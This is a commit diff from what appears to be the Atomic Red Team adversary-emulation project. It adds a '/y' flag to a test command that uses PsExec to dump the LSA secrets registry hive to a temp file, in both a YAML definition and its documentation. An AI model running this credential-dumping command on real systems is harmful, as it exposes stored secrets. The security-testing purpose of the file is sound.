Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

This commit is contained in:
CircleCI Atomic Red Team doc generator
2021-12-13 21:12:12 +00:00
parent 32eb49ca37
commit ff079fb1bf
2 changed files with 2 additions and 2 deletions
+1 -1
View File
@@ -3333,7 +3333,7 @@ credential-access:
Copy-Item $env:TEMP\PSTools\PsExec.exe #{psexec_exe} -Force
executor:
command: "#{psexec_exe} -accepteula -s reg save HKLM\\security\\policy\\secrets
%temp%\\secrets"
%temp%\\secrets /y"
cleanup_command: del %temp%\secrets >nul 2> nul
name: command_prompt
elevation_required: true
+1 -1
View File
@@ -36,7 +36,7 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
```cmd
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets
#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
```
#### Cleanup Commands: